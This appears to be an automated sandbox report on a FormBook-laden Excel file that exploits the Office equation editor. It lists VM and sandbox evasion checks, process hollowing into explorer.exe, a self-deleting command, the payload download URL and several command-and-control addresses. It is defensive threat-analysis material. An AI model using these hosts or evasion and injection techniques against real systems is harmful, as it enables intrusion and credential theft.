        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX (8 occurrences)
        Source: C:\Users\Public\vbc.exe; Process information set: NOOPENFILEERRORBOX (21 occurrences)
        Source: C:\Windows\SysWOW64\raserver.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Yara detected AntiVM3
        Source: Yara match; File source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: Process Memory Space: vbc.exe PID: 2028, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: SBIEDLL.DLL
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\Public\vbc.exe; RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\vbc.exe; RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exe; RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exe; RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852; Thread sleep time: -300000s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 3036; Thread sleep time: -39025s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 2964; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\raserver.exe TID: 2012; Thread sleep time: -32000s >= -30000s
        Source: C:\Windows\explorer.exe; Last function: Thread delayed
        Source: C:\Windows\SysWOW64\raserver.exe; Last function: Thread delayed
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_004088A0 rdtsc 7_2_004088A0
        Source: C:\Users\Public\vbc.exe; Thread delayed: delay time: 922337203685477
        Source: C:\Users\Public\vbc.exe; Process information queried: ProcessInformation
        Source: C:\Users\Public\vbc.exe; Thread delayed: delay time: 39025
        Source: C:\Users\Public\vbc.exe; Thread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmp; Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: vmware
        Source: explorer.exe, 00000008.00000000.491890159.000000000449C000.00000004.00000001.sdmp; Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmp; Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: VMWARE
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000008.00000000.539206634.000000000029B000.00000004.00000020.sdmp; Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
        Source: explorer.exe, 00000008.00000000.492529993.00000000045D6000.00000004.00000001.sdmp; Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: VMware SVGA II
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp; Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_004088A0 rdtsc 7_2_004088A0
        Source: C:\Users\Public\vbc.exe; Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\raserver.exe; Process token adjusted: Debug
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A526F8 mov eax, dword ptr fs:[00000030h] 7_2_00A526F8
        Source: C:\Windows\SysWOW64\raserver.exe; Code function: 9_2_01EF26F8 mov eax, dword ptr fs:[00000030h] 9_2_01EF26F8
        Source: C:\Users\Public\vbc.exe; Process queried: DebugPort
        Source: C:\Windows\SysWOW64\raserver.exe; Process queried: DebugPort
        Source: C:\Users\Public\vbc.exe; Code function: 7_2_00409B10 LdrLoadDll,7_2_00409B10
        Source: C:\Users\Public\vbc.exe; Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exe; Domain query: www.corpmat.com
        Source: C:\Windows\explorer.exe; Network Connect: 34.98.99.30 80
        Source: C:\Windows\explorer.exe; Network Connect: 144.217.61.66 80
        Source: C:\Windows\explorer.exe; Domain query: www.boxtobookshelf.com
        Source: C:\Windows\explorer.exe; Domain query: www.hansel-design.com
        Source: C:\Windows\explorer.exe; Domain query: www.aubergetoitrouge.com
        Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exe; Network Connect: 75.2.89.208 80
        Source: C:\Windows\explorer.exe; Domain query: www.afishin.com
        Sample uses process hollowing technique
        Source: C:\Users\Public\vbc.exe; Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 7C0000
        Maps a DLL or memory area into another process
        Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\raserver.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\raserver.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\Public\vbc.exe; Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Users\Public\vbc.exe; Thread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\Public\vbc.exe; Thread register set: target process: 1764
        Source: C:\Windows\SysWOW64\raserver.exe; Thread register set: target process: 1764
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe; Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\SysWOW64\raserver.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp; Binary or memory string: ProgmanG
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmp; Binary or memory string: !Progman
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmp; Binary or memory string: Program Manager<
        Source: C:\Users\Public\vbc.exe; Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
        Source: C:\Users\Public\vbc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected FormBook
        Source: Yara match; File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Remote Access Functionality:

        Yara detected FormBook
        Source: Yara match; File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Masquerading111 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools11 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol122 | SIM Card Swap |  | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information11 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Extra Window Memory Injection1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

        Behavior Graph

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph ID: 483690
        Sample: (RFQ) No.109050.xlsx
        Startdate: 15/09/2021
        Architecture: WINDOWS
        Score: 100

        Sample-level signatures:

        • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
        • Found malware configuration
        • Malicious sample detected (through community Yara rule)
        • 17 other signatures

        Process tree (graph nodes, with the hosts contacted, files dropped and signatures attached to each process):

        EQNEDT32.EXE (started; node counters: 12)
        • DNS/IP: 198.12.84.109, 49165, 80, AS-COLOCROSSINGUS, United States
        • Created file: C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 (dropped)
        • Created file: C:\Users\Public\vbc.exe, PE32 (dropped)
        • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
        • Starts: vbc.exe

        EXCEL.EXE (started; node counters: 34 36)
        • Created file: C:\Users\user\...\~$(RFQ) No.109050.xlsx, data (dropped)

        vbc.exe (started by EQNEDT32.EXE)
        • Signature: Machine Learning detection for dropped file
        • Signature: Tries to detect virtualization through RDTSC time measurements
        • Signature: Injects a PE file into a foreign processes
        • Starts: vbc.exe

        vbc.exe (started by vbc.exe)
        • Signature: Modifies the context of a thread in another process (thread injection)
        • Signature: Maps a DLL or memory area into another process
        • Signature: Sample uses process hollowing technique
        • Signature: Queues an APC in another process (thread injection)
        • Injects into: explorer.exe

        explorer.exe (injected)
        • DNS/IP: aubergetoitrouge.com 144.217.61.66, 49166, 80, OVHFR, Canada
        • DNS/IP: afishin.xshoppy.shop 75.2.89.208, 49168, 80, AMAZON-02US, United States
        • DNS/IP: 7 other IPs or domains
        • Signature: System process connects to network (likely due to code injection or exploit)
        • Starts: raserver.exe

        raserver.exe (started by explorer.exe)
        • Signature: Modifies the context of a thread in another process (thread injection)
        • Signature: Maps a DLL or memory area into another process
        • Signature: Tries to detect virtualization through RDTSC time measurements
        • Starts: cmd.exe

        cmd.exe (started by raserver.exe)

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        (RFQ) No.109050.xlsx | 34% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        7.2.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

        Domains

        Source | Detection | Scanner | Label
        boxtobookshelf.com | 1% | Virustotal |
        corpmat.com | 0% | Virustotal |

        URLs

        Source | Detection | Scanner | Label
        http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
        http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 | 0% | Avira URL Cloud | safe
        http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
        http://treyresearch.net | 0% | URL Reputation | safe
        http://java.sun.com | 0% | Avira URL Cloud | safe
        http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
        http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 | 100% | Avira URL Cloud | malware
        http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 | 0% | Avira URL Cloud | safe
        http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
        http://198.12.84.109/cmd/vbc.exe | 0% | Avira URL Cloud | safe
        www.afishin.com/r48a/ | 100% | Avira URL Cloud | malware
        http://www.%s.comPA | 0% | URL Reputation | safe
        http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 | 0% | Avira URL Cloud | safe
        http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        boxtobookshelf.com | 34.98.99.30 | true | false | | unknown
        afishin.xshoppy.shop | 75.2.89.208 | true | true | | unknown
        corpmat.com | 34.102.136.180 | true | false | | unknown
        aubergetoitrouge.com | 144.217.61.66 | true | true | | unknown
        www.hansel-design.com | unknown | unknown | true | | unknown
        www.aubergetoitrouge.com | unknown | unknown | true | | unknown
        www.corpmat.com | unknown | unknown | true | | unknown
        www.afishin.com | unknown | unknown | true | | unknown
        www.boxtobookshelf.com | unknown | unknown | true | | unknown

                      Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 | false | Avira URL Cloud: safe | unknown
        http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 | true | Avira URL Cloud: malware | unknown
        http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 | false | Avira URL Cloud: safe | unknown
        http://198.12.84.109/cmd/vbc.exe | true | Avira URL Cloud: safe | unknown
        www.afishin.com/r48a/ | true | Avira URL Cloud: malware | low
        http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://www.windows.com/pctv. | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
        http://investor.msn.com | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
        http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
        http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
        http://www.iis.fhg.de/audioPA | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
        http://www.hotmail.com/oe | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
        http://treyresearch.net | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | false | | high
        http://java.sun.com | explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.icra.org/vocabulary/. | explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp | false | | high
        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp | false | | high
        http://www.day.com/dam/1.0 | 45F1FF87.emf.0.dr | false | | high
        http://investor.msn.com/ | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
        http://www.piriform.com/ccleaner | explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp | false | | high
        http://computername/printers/printername/.printer | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
        http://www.%s.comPA | explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
        http://www.autoitscript.com/autoit3 | explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | false | | high
        https://support.mozilla.org | explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | false | | high
        http://servername/isapibackend.dll | explorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                              Contacted IPs

                                              Public

        IP | Domain | Country | ASN | ASN Name | Malicious
        198.12.84.109 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
        34.102.136.180 | corpmat.com | United States | 15169 | GOOGLEUS | false
        34.98.99.30 | boxtobookshelf.com | United States | 15169 | GOOGLEUS | false
        144.217.61.66 | aubergetoitrouge.com | Canada | 16276 | OVHFR | true
        75.2.89.208 | afishin.xshoppy.shop | United States | 16509 | AMAZON-02US | true

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:483690
                                              Start date:15.09.2021
                                              Start time:11:40:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 47s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:(RFQ) No.109050.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:2
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLSX@9/19@5/5
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 6.3% (good quality ratio 6%)
                                              • Quality average: 72.9%
                                              • Quality standard deviation: 26.5%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 101
                                              • Number of non-executed functions: 52
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

        Time | Type | Description
        11:41:45 | API Interceptor | 64x Sleep call for process: EQNEDT32.EXE modified
        11:41:48 | API Interceptor | 53x Sleep call for process: vbc.exe modified
        11:42:12 | API Interceptor | 206x Sleep call for process: raserver.exe modified
        11:43:06 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

        Match | Associated Sample Name / URL | Detection | Context
        198.12.84.109 | ORDER 5172020.xlsx | malicious | 198.12.84.109/avs/vbc.exe
        198.12.84.109 | PO-80722 .xlsx | malicious | 198.12.84.109/av/vbc.exe
        198.12.84.109 | ORDER 5172020.xlsx | malicious | 198.12.84.109/rever/vbc.exe
        198.12.84.109 | PO 60078.xlsx | malicious | 198.12.84.109/http/vbc.exe
        198.12.84.109 | Players profile-661735550.xlsx | malicious | 198.12.84.109/www/vbc.exe
        198.12.84.109 | ORDER 922021.xlsx | malicious | 198.12.84.109/kews/vbc.exe
        198.12.84.109 | Quotation request.xlsx | malicious | 198.12.84.109/wdcb/vbc.exe
        198.12.84.109 | PO 446593.xlsx | malicious | 198.12.84.109/ping/vbc.exe
        198.12.84.109 | RFQ 10305 .xlsx | malicious | 198.12.84.109/pnb/vbc.exe
        198.12.84.109 | 19082021.xlsx | malicious | 198.12.84.109/hdfc/vbc.exe
        144.217.61.66 | ORDER 5172020.xlsx | malicious | www.aubergetoitrouge.com/r48a/?-ZDhz=WvIXBnuXy4zpuni0&8pBh=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==
        144.217.61.66 | ORDER 5172020.xlsx | malicious | www.aubergetoitrouge.com/r48a/?Br=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&nleTs=-Zy83VrHWfxhip

                                              Domains

        Match | Associated Sample Name / URL | Detection | Context

                                              ASN

        Match | Associated Sample Name / URL | Detection | Context
        OVHFR | ORDER CONFIRMATION.xlsx | malicious | 192.99.131.252
        OVHFR | qy2t7MIRoi.exe | malicious | 92.222.145.236
        OVHFR | ORDER 5172020.xlsx | malicious | 144.217.61.66
        OVHFR | zB34E25PZM.exe | malicious | 87.98.185.184
        OVHFR | USD INV#1191189.xlsx | malicious | 213.186.33.5
        OVHFR | mips | malicious | 54.37.203.235
        OVHFR | lEsEX3McwH.exe | malicious | 51.254.69.209
        OVHFR | 5cv9ajEWlI | malicious | 51.79.103.19
        OVHFR | oAQ0OaThsM | malicious | 213.251.181.247
        OVHFR | ORDER 5172020.xlsx | malicious | 144.217.61.66
        OVHFR | New_PO0056329.xlsx | malicious | 164.132.216.38
        OVHFR | Z9GkJvygEk.exe | malicious | 149.56.94.218
        OVHFR | RZAcKBlQo0.exe | malicious | 51.89.143.152
        OVHFR | F1MwWrwBR7.exe | malicious | 51.89.143.157
        OVHFR | Ernest_Skye_Mitchell.html | malicious | 167.114.119.127
        OVHFR | mDkCoW1yzV.exe | malicious | 51.89.96.41
        OVHFR | Payment voucher. pdf.................gz.exe | malicious | 51.222.134.241
